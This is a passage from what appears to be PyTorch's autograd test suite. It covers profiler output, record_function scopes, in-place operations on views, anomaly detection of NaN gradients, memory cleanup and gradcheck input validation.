        sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
    print(prof.key_averages(group_by_input_shape=True).table(
        sort_by="self_cpu_time_total", row_limit=10))
    print(prof.table(
        sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
    print(prof.key_averages(group_by_input_shape=True).table(
        sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
    total_time_us = total_time_s * 1000.0 * 1000.0  # make it us which is profiler default
    print(
        "Total time based on python measurements: ",
        _format_time(total_time_us)
    )
    print(
        "CPU time measurement python side overhead: {:.2f}%".format(
            (total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
        )
    )
    # Chrome trace export is exercised only where NamedTemporaryFile can be
    # reopened by name (not on Windows).
    if sys.platform != "win32":
        with tempfile.NamedTemporaryFile() as trace_file:
            prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
    """record_function scopes interleave correctly with op events.

    Runs a nested outer/inner record_function around arithmetic ops and
    checks the expected event names appear in order (subsequence match).
    Also checks record_function works as a decorator.
    """
    x = torch.randn(10, 10)

    def forward(x):
        with record_function("outer"):
            y = x * 2 + 4
            with record_function("inner"):
                y = y - 1
        y = y / 1

    # warm-up run outside the profiler
    forward(x)

    with profile(use_kineto=kineto_available()) as p:
        forward(x)

    events = p.function_events
    important_events = [
        'outer',
        'aten::mul',
        'aten::add',
        'inner',
        'aten::sub',
        'aten::div'
    ]
    # verify important_events occur as an ordered subsequence of events
    idx = 0
    for info in events:
        if info.name == important_events[idx]:
            idx = idx + 1
        if idx == len(important_events):
            break
    self.assertEqual(idx, len(important_events))

    # We can also use record_function to decorate arbitrary function
    @record_function('my_func')
    def f(x, y):
        return x + y

    with profile(use_kineto=kineto_available()) as p:
        f(1, 2)

    self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
    """Out-of-order record_function enter/exit pairs must not throw.

    Exercises exiting an outer scope while an inner one is active, and
    re-entering/exiting while inside another scope — patterns that occur
    when scopes end on different threads.
    """
    rf = record_function("outer")
    rf.__enter__()
    with record_function("inner"):
        # test that exiting the record function after starting another one
        # doesn't throw.
        rf.__exit__(None, None, None)

    with record_function("inner"):
        rf.__enter__()
    # test that exiting the record function after ending another one
    # doesn't throw.
    rf.__exit__(None, None, None)
def test_dir(self):
    """dir() on a tensor lists working attributes; real/imag need complex dtype."""
    real_tensor = torch.randn(10, 10)
    attrs = dir(real_tensor)
    self.assertIn('shape', attrs)

    # real and imag are only implemented for complex tensors.
    complex_tensor = torch.randn(10, 10, dtype=torch.cfloat)
    for attr in ('real', 'imag'):
        self.assertRaises(RuntimeError, lambda: hasattr(real_tensor, attr))
        self.assertTrue(hasattr(complex_tensor, attr))
        attrs.remove(attr)

    # everything else listed by dir() must be accessible on a real tensor
    for attr in attrs:
        self.assertTrue(hasattr(real_tensor, attr))
def test_inplace_on_view_saved_output(self):
    # Test an in-place operation on a view in which the in-place op saves
    # its output. Previously, this created a reference cycle.
    # The hook object's __del__ increments dealloc[0]; if the graph leaked
    # via a reference cycle, the hook would never be collected and the
    # final count would stay 0.
    dealloc = [0]

    class IncrementOnDelete(object):
        def __del__(self):
            dealloc[0] += 1

    def test():
        root = torch.randn(3, 3, requires_grad=True)
        copy = root.clone()
        copy.grad_fn.register_hook(IncrementOnDelete())
        view = copy.view(9)
        torch.nn.functional.relu(view, inplace=True)

    test()
    # once test() returns, the graph (and the hook) must have been freed
    self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
    """In-place ops on a view of a grad-requiring leaf must fail eagerly."""
    # Issue #21875: Fail faster (when we try to modify the view vs. in backward())
    leaf = torch.zeros(1, requires_grad=True)
    view = leaf.view_as(leaf)
    expected_msg = ("a view of a leaf Variable that "
                    "requires grad is being used in "
                    "an in-place operation.")
    with self.assertRaisesRegex(RuntimeError, expected_msg):
        view.add_(1)
def test_inplace_on_view_backward(self):
    # Issue #10532: Make sure that this does not raise RuntimeError.
    net = nn.Sequential(
        nn.InstanceNorm2d(2),
        nn.ReLU(True)
    )

    x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
    # double backward through an in-place ReLU must work and leave x intact
    g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
    torch.autograd.grad(g.sum(), [x])
    self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))

    # https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
    inputs = torch.ones((1, 3, 256, 256), requires_grad=True)

    tmp1 = (inputs + 1).view_as(inputs)
    # in-place threshold on a view; gradient penalty pattern from the forum post
    tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
    prob_interpolated = torch.sigmoid(tmp2)

    gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
                                    grad_outputs=torch.ones(prob_interpolated.size()),
                                    create_graph=True, retain_graph=True)[0]

    gradient_penalty = gradients.sum()
    gradient_penalty.backward()

    # the threshold backward node must appear at the expected graph position
    fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
    self.assertEqual(fn.name(), "ThresholdBackwardBackward0")
def test_inplace_on_view_weak_grad_fn(self):
    # Issue 23502: Test that b's grad_fn is preserved.
    a = torch.arange(10.0, requires_grad=True)

    b = a.narrow(0, 0, 2).clone().view(-1)
    b.relu_()

    c = b.clone()
    # drop b and force collection; c's graph must survive
    del b
    gc.collect()

    s = c.sum()
    s.backward()
    self.assertEqual(s, torch.tensor(1.0))

    # Issue #21875: Fail faster (when we try to modify the view vs. in backward())
    a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
    with self.assertRaises(RuntimeError):
        b = a.relu_()
def test_out_variant_raises_when_inputs_require_grad(self):
    """out= ops reject autograd both for grad-requiring inputs and outputs."""
    lhs = torch.randn(2, 2, requires_grad=True)
    rhs = torch.randn(2, 2, requires_grad=True)
    result = torch.zeros_like(lhs)
    # out=... functions don't support automatic differentiation currently
    self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(lhs, rhs, out=result))

    # the inputs can require grad if we're in no_grad() mode
    with torch.no_grad():
        torch.mul(lhs, rhs, out=result)
        self.assertEqual(result, lhs * rhs)

    lhs = torch.randn(2, 2)
    rhs = torch.randn(2, 2)
    result = torch.zeros(2, 2, requires_grad=True)
    # we should throw an exception if the output requires grad
    self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(lhs, rhs, out=result))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
    """The first-order gradient of diagonal()**2 must itself require grad.

    diagonal_backward uses in-place operations, and gradgradcheck would not
    catch a gradient that wrongly has requires_grad == False, so check it
    directly.
    """
    inp = torch.randn(5, 6, requires_grad=True)
    squared_diag = torch.diagonal(inp)**2
    scalar = squared_diag.sum()
    grad, = torch.autograd.grad(scalar, inp, retain_graph=True, create_graph=True)
    self.assertTrue(grad.requires_grad)
def test_anomaly_detect_nan(self):
    """detect_anomaly reports which backward output produced a NaN.

    MyFunc's backward deliberately divides by zero; with anomaly mode on,
    the error must name the offending output index, and the warning must
    include forward-pass trace info when available (second case) or say
    'No forward pass information' when the graph was built outside
    detect_anomaly (first case).
    """
    size = 10

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, inp1, inp2, fail_0th):
            ctx.fail_0th = fail_0th
            return inp1.sum(0, keepdim=True)

        @staticmethod
        def backward(ctx, gO):
            gI = gO.clone().expand(size)
            gI[0] = 0
            gI[0] /= 0  # Generate a nan
            # fail_0th selects which grad slot carries the NaN
            if ctx.fail_0th:
                return gI, None, None
            else:
                return None, gI, None

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, inp, True)
    out.backward()  # Should not fail

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, inp, True)
    with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                out.backward()
        # forward ran outside detect_anomaly, so no stack is available
        self.assertIn('No forward pass information', str(w[0].message))

    inp = torch.rand(size, requires_grad=True)
    with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                out = MyFunc.apply(inp, inp, False)
                out.backward()
        # forward ran inside detect_anomaly, so the stack names the call site
        self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
    """Anomaly mode attributes NaNs produced in a nested (double) backward.

    MyFunc's backward calls MyFunc2, whose backward divides by zero. The
    error must name MyFunc2Backward's failing output; warning contents
    depend on whether the first backward ran inside detect_anomaly.
    """
    size = 10

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, inp1, fail_0th):
            ctx.fail_0th = fail_0th
            ctx.save_for_backward(inp1)
            return inp1.sum(0, keepdim=True)

        @staticmethod
        def backward(ctx, gO):
            inp, = ctx.saved_tensors
            fail_0th = ctx.fail_0th
            g = gO.clone().expand(size)
            # nest a second custom function inside backward
            gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
            return gI, None

    class MyFunc2(Function):
        @staticmethod
        def forward(ctx, inp1, inp2, fail_0th):
            ctx.fail_0th = fail_0th
            return inp1 * 2.0 + inp2

        @staticmethod
        def backward(ctx, gO):
            fail_0th = ctx.fail_0th
            g1 = gO.clone()
            g2 = gO.clone()
            g1[0] = 0
            g2[0] = 0
            # generate a nan
            if fail_0th:
                g1[0] /= 0
            else:
                g2[0] /= 0
            return g1, g2, None

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, True)
    ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
    gsum = ginp.sum()
    gsum.backward()  # should not fail

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, True)
    ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
    gsum = ginp.sum()
    with warnings.catch_warnings(record=True) as w:
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
            with detect_anomaly():
                gsum.backward()
    # first backward ran outside anomaly mode -> no forward stack recorded
    self.assertIn('No forward pass information', str(w[1].message))

    inp = torch.rand(size, requires_grad=True)
    with warnings.catch_warnings(record=True) as w:
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
            with detect_anomaly():
                out = MyFunc.apply(inp, False)
                ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
                gsum = ginp.sum()
                gsum.backward()
    # both the nested call site and the outer call site are reported
    self.assertIn('MyFunc2.apply', str(w[1].message))
    self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
    # PyTorch won't throw warnings if there is an error
    # but we'd want to at least see them in stderr

    class StdErrDiverter:
        # captures everything written to sys.stderr while active
        def __enter__(self):
            self.stderr_orig = sys.stderr
            self.stderr_new = io.StringIO()
            sys.stderr = self.stderr_new
            return self

        def __exit__(self, *args):
            self.captured = self.stderr_new.getvalue()
            sys.stderr = self.stderr_orig

    # if the warnings don't throw, they will be handled as regular warnings
    with self.assertRaisesRegex(RuntimeError,
                                "one of the variables needed for gradient computation has been "
                                "modified by an inplace operation"):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                a = torch.randn(5, requires_grad=True)
                d1 = a + 1
                d2 = d1 ** 2
                d1 += 1
                torch.autograd.grad(d2.sum(), a)

    self.assertEqual(len(w), 2)
    self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
    self.assertIn('Error detected in PowBackward0', str(w[1].message))

    # if the warning throws, it will be printed to sys.stderr
    with self.assertRaisesRegex(RuntimeError,
                                "one of the variables needed for gradient computation has been "
                                "modified by an inplace operation"):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                # escalate warnings to errors so the anomaly warning is
                # forced onto stderr instead of the warning registry
                warnings.simplefilter("error")
                with StdErrDiverter() as s:
                    a = torch.randn(5, requires_grad=True)
                    d1 = a + 1
                    d2 = d1 ** 2
                    d1 += 1
                    torch.autograd.grad(d2.sum(), a)

    self.assertEqual(len(w), 1)
    self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
    self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
    # Test that python objects created are properly cleaned up when assign_parent is called
    import weakref

    def get_ref():
        # we use torch.exp here but any function that will construct a new node in its
        # backward call in grad mode will work
        x = torch.randn(2, 2, requires_grad=True)
        t = x.exp()

        # ExpBackward calls mul, creating the MulBackward node when create_graph=True.
        # In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
        # MulBackward's anomaly metadata dict, creating the following reference chain:
        #
        # grad -> MulBackward -> PyObject -> ExpBackward
        #
        with detect_anomaly():
            grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)

        # We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
        #
        # (PyObject) -> ExpBackward -> dict -> *Foo*
        #            t ----^        WeakRef ---^
        #
        # We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
        # We can test this by seeing whether Foo is not kept alive once t is destroyed
        class Foo(object):
            pass
        my_obj = Foo()
        meta_dict = t.grad_fn.metadata
        meta_dict[0] = my_obj
        ref = weakref.ref(my_obj)
        return t, ref

    t, ref = get_ref()
    # Foo is alive while t (and thus ExpBackward's metadata dict) is alive...
    self.assertIsNotNone(ref())
    del t
    # ...and must be collected once t is gone — proving no leaked PyObject
    self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
    # Test if metadata dict PyObject is properly destroyed
    import weakref

    def get_ref():
        # This is similar to the construction in test_anomaly_assign_parent_cleanup:
        #
        # MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
        #                               out ---^         WeakRef ---^
        #
        # We want to check that Foo is still properly destroyed even when MyFunc2Backward's
        # AnomalyMetadata calls printstack, which does some python object manipulation.
        #
        # You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
        # since if PyObject is not destroyed here, wouldn't this test would detect that also?
        # The answer is that custom function's PyObject (THPFunction) actually only hold
        # a weak reference to the c++ node!
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, x):
                ctx.save_for_backward(x)
                return x

            @staticmethod
            def backward(ctx, gO):
                x, = ctx.saved_tensors
                return MyFunc2.apply(x)

        class MyFunc2(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, gO):
                # NaN in the double-backward triggers anomaly printstack
                return gO + float("NaN")

        inp = torch.rand(1, requires_grad=True)
        out = MyFunc.apply(inp)
        ginp, = torch.autograd.grad(out, (inp,), create_graph=True)

        with warnings.catch_warnings(record=True) as w:
            with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
                with detect_anomaly():
                    ginp.backward()

        class Foo(object):
            pass
        my_obj = Foo()
        meta_dict = out.grad_fn.metadata
        meta_dict[0] = my_obj
        ref = weakref.ref(my_obj)
        return out, ref

    t, ref = get_ref()
    # Foo is reachable through out's metadata dict while t is alive...
    self.assertIsNotNone(ref())
    del t
    # ...and must be freed with it, even after printstack ran
    self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
    """Backward through eig(eigenvectors=False) is rejected as non-differentiable."""
    matrix = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
    eigvals, eigvecs = torch.eig(matrix, eigenvectors=False)
    grads = [torch.ones_like(eigvals), torch.ones_like(eigvecs)]
    with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
        torch.autograd.backward([eigvals, eigvecs], grads)
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
    """Backward through eig with complex eigenvalues is rejected."""
    matrix = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
    eigvals, eigvecs = torch.eig(matrix, eigenvectors=True)
    grads = [torch.ones_like(eigvals), torch.ones_like(eigvecs)]
    with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
        torch.autograd.backward([eigvals, eigvecs], grads)
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
    """Backward through symeig(eigenvectors=False) is rejected as non-differentiable."""
    matrix = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
    eigvals, eigvecs = torch.symeig(matrix, eigenvectors=False)
    grads = [torch.ones_like(eigvals), torch.ones_like(eigvecs)]
    with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
        torch.autograd.backward([eigvals, eigvecs], grads)
@skipIfNoLapack
def test_svd_no_singularvectors(self):
    """Backward through svd(compute_uv=False) cannot be computed and must raise."""
    matrix = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
    u, s, v = torch.svd(matrix, compute_uv=False)
    grads = [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)]
    with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
        torch.autograd.backward([u, s, v], grads)
def test_no_grad_copy(self):
    """The autograd engine reuses the incoming grad buffer when it can.

    MyFunc.backward records the data pointer of the grad it receives; after
    accumulation into a.grad/b.grad, exactly one of them may alias that
    buffer (no-copy path), and a non-contiguous grad must always be copied.
    """
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None

        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2

        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad.data_ptr()
            return grad, grad

    class NonContGradFunc(Function):
        @staticmethod
        def forward(ctx, inp1):
            ctx.size = inp1.size()
            return torch.tensor([1.])

        @staticmethod
        def backward(ctx, grad):
            # expanded tensor -> non-contiguous grad flows to MyFunc
            return torch.ones(1).expand(ctx.size)

    a = torch.randn(5, 6, requires_grad=True)
    b = torch.randn(5, 6, requires_grad=True)
    # non-contiguous grad should be copied
    NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
    self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
    self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)

    # test case that should trigger no copy for one of a,b
    a.grad = b.grad = None
    MyFunc.apply(a, b)[1][0].backward()
    p_g = MyFunc.static_grad_ptr
    p_a = a.grad.data_ptr()
    p_b = b.grad.data_ptr()
    # check a,b uses different grad buffer
    self.assertFalse(p_a == p_b)
    # check one of them is using the computed buffer
    self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
    """Sparse-grad analogue of test_no_grad_copy.

    With contiguous sparse grads, exactly one of a.grad/b.grad may alias
    the buffer produced in backward; with non-contiguous indices/values
    both must be cloned. Repeated backward passes check accumulation.
    """
    # create autograd function that saves grad pointer as class static
    class MyFunc(Function):
        static_grad_ptr = None

        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2

        @staticmethod
        def backward(ctx, grad):
            MyFunc.static_grad_ptr = grad._values().data_ptr()
            return grad, grad

    class NonContGradFunc(Function):
        static_grad_ptr = None

        @staticmethod
        def forward(ctx, inp1, inp2):
            return inp1 + inp2

        @staticmethod
        def backward(ctx, grad):
            # Create a sparse tensor with non-contigous indices and values
            # and return as grad.
            v = torch.rand(1, 3)
            i = torch.ones(1, 1, dtype=torch.long)
            nv = v.expand(8, 3)
            ni = i.expand(1, 8)
            ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
            NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
            return ngrad, ngrad

    a = torch.randn(10, 3, requires_grad=True)
    b = torch.randn(10, 3, requires_grad=True)
    input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
    offsets = torch.tensor([0, 4])
    import torch.nn.functional as F

    # test case that should trigger no copy for one of a,b
    emb_matrix = MyFunc.apply(a, b)
    loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
    loss.backward(retain_graph=True)
    p_g = MyFunc.static_grad_ptr
    p_a = a.grad._values().data_ptr()
    p_b = b.grad._values().data_ptr()
    # check a,b uses different grad buffer
    self.assertFalse(p_a == p_b)
    # check one of them is using the computed buffer
    self.assertTrue(p_a == p_g or p_b == p_g)

    # Run backwards multiple times to ensure accumulation works.
    for i in range(10):
        loss.backward(retain_graph=True)

    # non-contiguous indices and value, we should trigger a copy.
    a.grad = b.grad = None
    emb_matrix = NonContGradFunc.apply(a, b)
    loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
    loss.backward(retain_graph=True)
    p_g = NonContGradFunc.static_grad_ptr
    p_a = a.grad._values().data_ptr()
    p_b = b.grad._values().data_ptr()
    # check a,b uses different grad buffer
    self.assertFalse(p_a == p_b)
    # Verify we cloned both grads.
    self.assertFalse(p_a == p_g)
    self.assertFalse(p_b == p_g)

    # Run backwards multiple times to ensure accumulation works.
    for i in range(10):
        loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
    """gradcheck/gradgradcheck accept a bare tensor input, in both modes."""
    def check(fast_mode):
        def scaled(t):
            return t.mul(5)
        gradcheck(scaled, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
        gradgradcheck(scaled, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)

    for mode in (True, False):
        check(fast_mode=mode)
def test_gradcheck_sparse_input(self):
    """Sparse inputs are accepted only when check_sparse_nnz=True."""
    def check(fast_mode):
        def sparse_sum(sparse):
            return torch.sparse.sum(sparse)
        gradcheck(sparse_sum, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True),
                  check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
            gradcheck(sparse_sum, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True),
                      check_sparse_nnz=False, check_batched_grad=False, fast_mode=fast_mode)

    for mode in (True, False):
        check(fast_mode=mode)
def test_gradcheck_nondeterministic(self):
    """nondet_tol controls how much backward non-determinism gradcheck accepts.

    NonDetFunc injects multiplicative jitter into its backward; with the
    default tolerance gradcheck must report 'Backward is not reentrant',
    and with nondet_tol=1e-5 the same jitter levels must pass.
    """
    class NonDetFunc(Function):
        @staticmethod
        def forward(ctx, x, jitter=0.0):
            ctx._jitter = jitter
            return x

        @staticmethod
        def backward(ctx, grad_out):
            # random perturbation scaled by the configured jitter
            return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None

    def check(fast_mode):
        inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
        gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
            gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
        with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
            gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
        gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
                  fast_mode=fast_mode)
        gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
                  fast_mode=fast_mode)
        gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
                      fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
    """Input validation in gradcheck: sparse flags, requires_grad, dtype, strides.

    Cases that always raise do so even with raise_exception=False; the
    float32 case only warns.
    """
    def check(fast_mode):
        # when inputs are not dense, but check_sparse_nnz is false
        x = torch.rand(10, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
            gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
                      fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
                                   check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))

        # when none of the inputs require grad (always raises even if raise_exception=False)
        x = torch.rand(10, requires_grad=False)
        with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
            gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)

        # (warning) when inputs are not double precision
        x = torch.ones(1, dtype=torch.float32, requires_grad=True)
        with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
            self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))

        # when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
        # even if raise_exception=False)
        x = torch.ones(1, dtype=torch.float64, requires_grad=True)
        x = x.expand((2, 2))
        with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
            gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
    # when mkldnn inputs, forward mode testing is not allowed
    # Update tolerances below to make sure the gradient match even in single precision floats
    # Use the warning assert to hide the float32 warning
    # Both fast and slow mode must reject check_forward_ad with MKLDNN inputs.
    x = torch.ones(1).to_mkldnn().requires_grad_()
    with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
        with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
            gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
                      atol=1e-1, rtol=1e-1)

    with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
        with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
            gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
                      atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
    """Sparse or MKLDNN outputs always raise, even with raise_exception=False."""
    def check(fast_mode):
        # when sparse outputs (always raise even if raise_exception=False)
        sparse_input = torch.rand(10, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
            gradcheck(lambda x: x, (sparse_input,), check_sparse_nnz=True, check_batched_grad=False,
                      raise_exception=False, fast_mode=fast_mode)

        # when mkldnn outputs (always raise even if raise_exception=False)
        dense_input = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
        with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
            gradcheck(lambda x: x.to_mkldnn(), (dense_input,), check_batched_grad=False,
                      raise_exception=False, fast_mode=fast_mode)

    for mode in (True, False):
        check(fast_mode=mode)
def test_gradcheck_check_no_differentiable_outputs(self):
    """gradcheck fails when a non-differentiable output has a nonzero
    numerical gradient, and succeeds when the function has no outputs.

    Bug fix: the raising ``gradcheck`` call previously dropped ``check``'s
    ``fast_mode`` argument, so that path was only ever tested in slow mode.
    """
    def check(fast_mode):
        # When none of the outputs are differentiable, but numerical gradient is not zero
        x = torch.ones((1,), requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
            # pass fast_mode through so both modes actually exercise this path
            gradcheck(lambda x: torch.tensor([x]), x, fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))

        # succeed when no outputs at all
        self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
    """Batched-grad failures raise, or return False with raise_exception=False."""
    def check(fast_mode):
        sparse_input = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
        # runtime error while compute batched grad (print big error)
        with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
            gradcheck(lambda x: x.to_dense(), (sparse_input,), check_sparse_nnz=True,
                      check_batched_grad=True, fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: x.to_dense(), (sparse_input,), check_sparse_nnz=True,
                                   check_batched_grad=True, raise_exception=False, fast_mode=fast_mode))

    for mode in (True, False):
        check(fast_mode=mode)
def test_gradcheck_backward_mul_by_grad_output(self):
    """gradcheck detects backwards that mishandle grad_output.

    Covers: sparse grad with wrong sparse_dim/dense_dim, backward that
    adds a constant instead of scaling grad_output (dense and sparse
    cases), and grad_input whose layout differs from the input's.
    """
    # when grad_input is sparse and has incorrect sparse_dim/dense_dim
    def check(fast_mode):
        def fn(x):
            def hook(grad):
                if grad is not None:
                    # corrupt sparse_dim on the way back
                    return grad.to_dense().to_sparse(1)
                return grad
            y = x.clone()
            y.register_hook(hook)
            return y.to_dense()
        x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
            gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                   raise_exception=False, fast_mode=fast_mode))

        # when backward not multiplied by grad_output (non-sparse case)
        def fn2(x):
            y = x.clone()
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
